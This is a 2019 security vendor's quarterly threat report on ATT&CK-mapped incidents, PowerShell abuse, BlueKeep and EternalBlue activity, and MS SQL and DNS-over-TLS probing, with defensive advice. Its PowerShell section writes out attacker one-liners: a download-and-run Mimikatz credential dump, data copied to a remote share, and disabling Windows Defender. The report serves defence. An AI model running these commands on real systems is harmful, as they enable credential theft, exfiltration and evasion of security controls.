It’s been a busy year for both attackers and defenders, and it seems as if activity levels have been dialed up all the way to 11 in Q3 of 2019. This edition of our quarterly threat readout has some methodology changes, the biggest of which is a full shift to MITRE ATT&CK and VERIS-based incident reporting and deprecation of our custom InsightIDR alerts. We’re “all-in” on ATT&CK at Rapid7, and normalizing all of our threat information to ATT&CK and VERIS should make it easier for organizations to map our findings to their own environments. 

Along with our regularly scheduled incident overviews, we’ll be taking a deep dive into PowerShell-based attacker actions, seeing what our adversaries are foraging for as they work to “live off the land.” We’ll then listen in as opportunistic folks sing the Blues (i.e. BlueKeep and EternalBlue activity), followed up with a sequel of MS SQL Server shenanigans and exploring some strange DNS over TLS activity. Buckle up! It’s going to be a bumpy ride!

As noted in the Introduction, we’re using VERIS and MITRE ATT&CK to describe incidents. You’re likely already familiar with VERIS as it’s used by the Verizon Data Breach Investigations Report (DBIR)^[4]—a “must read” for any cybersecurity professional. We’ve used the MITRE ATT&CK framework in previous reports, but in case you need a quick refresher, ATT&CK uses Tactics (the “kill chain”) and Techniques (attacker goals) within those Tactics to catalog attacker activity associated with incidents.

Figure 1 shows the breakdown of Q3 incidents by industry according to VERIS Actions. Our Managed Detection and Response (MDR) team generally sees one of three categories of Actions: Social (usually phishing), Malware (executions on systems post-initial compromise), and Hacking (most often credential loss or usage). 

A quick look at the heatmap shows most incidents were tagged with the Malware action. This means the initial compromise (generally phishing) wasn’t detected-then-contained, but rather nefarious activity was identified post-compromise as attackers went after their ultimate targets. We can dig into this a bit with Figure 2, which gives us a lower level look at the Tactics and Techniques used in Q3 2019.

Under the Execution Tactic we see heavy use of Third-Party Software^[5] and PowerShell^[6], so much so that we’re dedicating an entire section on that topic. We also see use of many other Windows components. This “living off the land” is present enough to warrant its own in-depth section as well. 

Figure 3 shows that the ATT&CK patterns were fairly common across industries with some—but not much—deviation when adversaries made it past Execution.

Don’t focus too much on the gray voids since there are many reasons that a Technique would not be detected for a given Tactic. Sure, it’s possible no attacker actions occurred in a given phase, but it’s also possible that an organization may not have sufficient event logging and log routing in place to enable detection of Techniques in those categories. 

Visibility across the board was high early on in the kill chain, preventing most (but not all) of attackers from moving to the right side of the kill chain. In fact, for the first time in the history of our Quarterly Threat Report, we’re providing a look at the dwell time (how long attackers lingered in the environment before containment) in Figure 4.

Most Q3 incidents were caught and contained within a 24-hour period, but some lingered a bit longer. These percentages of incidents caught early are well above the averages reported by the Verizon DBIR and are a big reason for the small percentage of Tactics found to the right of “Lateral Movement” in Figure 4. 

We’ll provide a full view of dwell time in 2019 in our Q4 and 2019 wrap-up report (due out February 2020), but dwell time is an important metric to track in your incident response program, too, since it can help you prioritize which detection capabilities to focus on and potential areas of increased training for your responders.

Key Takeaways

• Phishing is still the #1 way attackers breached defenses in Q3 2019. Recommendation: continue to improve your anti-phishing game.
• Attackers are using what’s available on systems to continue their campaigns. Recommendation: invest in detection capability at the endpoints to catch this activity.
• Track and manage dwell time to improve response outcomes.

[1] https://attack.mitre.org/

[2] http://veriscommunity.net/

[3] https://tools.ietf.org/html/rfc7858

[4] https://enterprise.verizon.com/resources/reports/dbir/

[5] (T1072) Third-Party Software — https://attack.mitre.org/techniques/T1072/

[6] (T1086) PowerShell — https://attack.mitre.org/techniques/T1086/

PowerShell continues to be a favorite for common threats, targeted threats, and penetration testers. With a fully scriptable language at their fingertips and command line features that allow them to stay hidden, it’s no wonder why so much bad stuff uses PowerShell. There are several tactics that attackers use to bend PowerShell to their bidding, including:

• Using old versions of PowerShell with less restrictions and logging: There are often multiple versions of PowerShell resident on Windows machines. Attackers will commonly use the -version flag to downgrade to version 2 or 3 of PowerShell.

• Bypassing any policy set to restrict PowerShell using the -ExecutionPolicy bypass switch.

• Using hidden window, bypass EULA, or other approvals, and bypassing logging using -noprofile, -noninteractive, and -nologo switches.

Once PowerShell has been invoked, the sky is the limit:

• A pentester can download Mimikatz: "powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/marcuscarey/0375f5e7bcb0d270eff1f81ef42d46fe/raw/3e72bb2670673b9b6414efcf6c857714995266d5/gistfile1.txt'); Invoke-Mimikatz -DumpCreds”"
• An attacker can package and stage data: "powershell.exe -exec bypass -command Copy-Item -Path C:\temp\* -Destination \\10.1.4.123\share”"
• An attacker can disable Windows Defender: "powershell Set-MpPreference -DisableRealtimeMonitoring $true"

Key Takeaways

There are a few mitigations that we recommend organizations put in place:

• Upgrade to the latest version of PowerShell and remove old versions.
• Enable extensive PowerShell logging.
• Setup monitoring for PowerShell switches commonly used by attackers.
• Configure PowerShell to run in constrained language mode.

In addition to the continued focus on using PowerShell, attackers seem to be finding everything they need directly loaded on the system. Here are the top 15 executables we saw across all MITRE ATT&CK tactics:

The continued focus on using built-in Windows functions allow the attackers to persist mostly unnoticed after their initial bypass of security controls. Few security tools will be looking for threats in scripting languages and administrative tools aimed at easy mass administration of systems give attackers all the visibility and control needed. Further, the Windows operating system itself does not function properly without most of these utilities. 

Key Takeaways

While these attacker techniques are impossible to prevent and particularly difficult to detect, there are some steps you can take:

1. Minimize the use of local and domain admin credentials.
   
2. Use strict authorization configurations for service, system, and automation accounts.
   
3. Do not publish highly sensitive or valuable information in your Active Directory configuration (don’t give away more information than you have to).
   
4. Monitor for known usage patterns for Windows utilities used by attackers.
   
5. Develop a threat hunting program that has process-level visibility into logs and can search for anomalies in the data set.

We’ve been keeping an eye on both EternalBlue^[7] (Windows Server Message Block [SMB] exploitation attempts) and BlueKeep^[8] (Windows Remote Desktop Protocol [RDP] exploit attempts) for quite some time and have some salient updates to share.

First is that we've seen probes, and, now, attacks against RDP servers that work against the weakness in CVE-2019-0708. Figure 9 shows the number of individual, daily hits against any given Lorelei ^[9] node. These are very low levels of activity, but “low” is not “zero.” It’s important to keep an eye on your perimeter, especially if you’re still running fast-and-loose exposing bare RDP to the public internet.

Keep that in mind as we dive into Figure 10, which features a short list of notable items for Q3 (and a bit into Q4 since we’re publishing in November). 

Across all honeypots we have a good idea of what the current baseline is for rdp.exploit (BlueKeep-like detections), with a spike in October well after the release of the Metasploit BlueKeep module. Most—if not all—of these exploit attempts fail, but it’s only a matter of time before attackers tweak enough bits to create more bulletproof code. We juxtaposed rdp.session events since those are brute-force/credential stuffing attempts that you also need to be concerned about if you’re still running RDP on your perimeter. Note the difference in the Y axis scales: hundreds of thousands of credential attempts versus a pittance of BlueKeep-oriented events. If you ever needed a reason to enforce multi-factor authentication on your RDP endpoints, you’ve now got one.

The other major, notable item is the massive uptick in MS SQL Server brute-force/credential stuffing attempts (mssql.login) right around the time a China-sourced backdoor was discovered by researchers^[10]. This time-series view is called a horizon chart^[11], and it acts as a cross between time-series line chart and heatmap, enabling a more condensed view while also giving your eye a quick view into the hotspots. This new uptick blew away previous baselines for both login attempts and commands (mssql.command), and we’re tracking if this is now the “new normal” or just a temporary blip. Either way, you should take some time to ensure you have no internet-facing SQL server instances, and then do a review of your internal instances to ensure the configurations match expectations and that there has been no unusual activity.

We’ve included smb.exploit (a.k.a. EternalBlue) since there is still a massive amount of attacker focus on that weakness. You should also continue to be vigilant that you’re not exposing that service externally and have maintained patch levels internally.

Finally, we’ve been tracking some unusual port 853 (DNS over TLS) activity since Q2 of this year (Figure 11) and wanted to raise awareness since DNS is a favorite channel for attackers for both command and control, as well as exfiltration.

Most of these attempts are just “are you there” queries, followed by another notable percentage of queries for version type and other benign DNS queries (the tiny percentage of blatant non-DNS activity has been filtered out for this view). The October spikes are mostly from residential networks in places we do not normally see in top “n” malicious activity lists (in this case Italy, Netherlands, and Germany).

Rapid7 Labs hasn’t figured out just what these opportunistic probes are trying to do, but we’re keeping an eye on the traffic and believe you should as well. In fact, we strongly suggest you block and report all attempts at outbound port 853 activity (TLS or otherwise) and, if possible, try to block or monitor usage of DNS over HTTPS. This is a more difficult feat since it likely requires breaking SSL/TLS connections with a proxy to inspect what’s going on. Browser developers and attackers (they’re both pretty much the same, now, right?) are both working hard to usurp your control over your organization’s DNS, thus removing this rich detection channel from your toolbelt. 

Key Takeaways

• Continue to remove RDP and SMB from your perimeter, and secure internal SMB and RDP servers appropriately.
  
• Spot check your MS SQL server installations and ensure no abnormal activity has been occurring.
  
• Block port 853 outbound and do your best to thwart attacker and browser manufacturer attempts to usurp control of your organization’s DNS.

[7] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue

[8] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 

[9] https://www.rapid7.com/research/project-lorelei/

[10] https://www.zdnet.com/article/researchers-find-stealthy-mssql-server-backdoor-developed-by-chinese-cyberspies/

[11] https://www.perceptualedge.com/blog/?p=390

Developing prevention, detection, and response capabilities aligned with the MITRE ATT&CK Framework gives organizations the opportunity to create a layered approach to keeping threats from becoming major breaches. Further, it also gives security leaders an industry-adopted standard and vocabulary to communicate with executives for budgeting and ROI for their security programs.

Based on the success Rapid7’s MDR team has had with aligning with the MITRE ATT&CK Enterprise Matrix in developing detections covering known tools, tactics, procedures, and behaviors, we recommend that all organizations invest in prevention, detection, and response models that give defenders maximum visibility into user authentication/authorization, endpoints, networks, and cloud-based services.

Due to the continued targeting of RDP, MSSQL, and SMB, we cannot stress enough that, at a minimum, these services should be removed from the public internet. Patching is great, of course, but save the patching efforts for those internal endpoints—there is no good reason to expose these services to the hostile internet.

Last, but not least, we recommend that you review the “Key Takeaways” sections of this Quarterly Threat Report and implement the recommendations within.

Organizations around the globe trust Rapid7 technology, services, and research to help them securely advance. The visibility, analytics, and automation delivered through our Insight cloud simplifies the complex and helps security teams reduce vulnerabilities, monitor for malicious behavior, investigate and shut down attacks, and automate routine tasks.